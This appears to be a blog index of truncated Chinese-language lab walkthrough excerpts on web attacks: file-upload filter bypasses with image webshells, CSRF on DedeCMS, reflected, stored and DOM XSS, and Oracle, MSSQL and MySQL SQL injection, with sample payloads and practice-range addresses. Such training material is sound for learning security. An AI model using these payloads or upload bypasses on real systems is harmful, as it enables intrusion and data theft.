心司+文件上传漏洞+Pass-03
Pass-031/ 上传p2.php 文件,得到 2/ 根据提示,不允许上传.asp,.aspx,.php,.jsp后缀文件!由于php脚本解析,除了.php,还有.phtml,.php3,.php4所以改成p2.phtml 3/ 点击上传,上传成功 4/ 复制图像地址,打开浏览器
心司+文件上传漏洞+Pass-02
Pass-02思路一:按照Pass-01的方法,也可以上传成功(Content-type类型判断机制)思路二:图片马绕过1/不知道有什么限制,先上传php文件(使用php脚本编写) 点击上传,回显 2/既然回显“文件类型不正确”,那么我们上传图片格式,使用以下方式制作图片马以记事本打开图片,留下前三行,把php代码复制到三行以下,如图: 3/上传,抓包,改
心司+文件上传漏洞+Pass-01
打开BurpSuite,点击 intercept off ,进行截获数据包 设置 BurpSuite的代理ip发送的地址 接着浏览器设置与BurpSuite一致的代理地址 这样设置后,就可以进行抓包处理了。 Pass-01开启 BurpSuite 抓包在不知道任何提示的情况下,通过分析 该网站是用php脚本编写的网站1/
心司+9.4、CSRF跨站伪造请求
9.4、CSRF跨站伪造请求打开靶场,点击链接根据网站显示 该网站是Dedecms,版本如下 DedeCMS_V57_UTF8_SP1 百度查询 其CMS版本有没有通杀的漏洞 打开此链接https://xz.aliyun.com/t/2237 可以得知会在/data目录下生成一个modifytmp.inc文件,并且这个inc文件的内容
心司+DOM XSS靶场
9.3、DOM XSS靶场 开放dom.php源码打开http://120.203.13.75:6815/3/dom.txt 通过审计代码,发现SafeFilter() 的实参不是一个数组不是一个数组,意味着 SafeFilter()会被跳过,最终都会在主目录创建log.html 文件内容<iframe src="'.$aa.'&qu
心司+存储型Xss靶场
9.2、存储型Xss靶场链接 http://117.41.229.122:8082/云悉指纹查到是CMSFineCMS 百度FineCMS xss漏洞查看该链接https://www.jianshu.com/p/200ea62486d9 通过该文章所述、测试是存在两个存储型XSS漏洞 测试第一个漏洞http://117.41.229.122:8082/in
心司+9.1、反射型XSS靶场
9.1、反射型XSS靶场打开网站输入框上输入123456在浏览器窗口,点击F12在Element栏目上Ctrl+F输入写入的‘123456’查询到有两个地方存在‘123456’分析所得<input name="keyword" value="123456">input可以加入oninput事件函数首先需value值为空<input name
心司+5.4.1、Oracle注入- 报错注入
打开靶场id=1' --正常回显id=1' order by 1--正常回显id=1' order by 4--错误回显字段数为3id=1' union all select null,null,null from dual--正常回显,注入成功测试每个字段的的类型,发现无法正常回显,此方法行不通and 1=ctxsys.drithsx.sn(1,(select t
心司+MSSQL注入 — 反弹注入
自建mssql环境,以下参数:服务器:SQL5006.webweb.com数据库名:DB_14A89D3_dedecms密码:123456789账号:DB_14A89D3_dedecms_admin?id=2%27%20and%201=2%20union%20all%20select%20id,name,null%20from%20dbo.sysobjects%20where%20xtype=%2
心司+DNS注入
5.2.1、MYSQL 注入 - 全方位利用?id=1'错误回显?id=1%20and%201=1正确回显说明存在注入猜解字段数?id=1%20order%20by%201正确回显?id=1%20order%20by%202正确回显?id=1%20order%20by%203错误回显说明字段数位2找到输出点?id=1 and 1=2 union select 1,2输出点为2数据库名称?i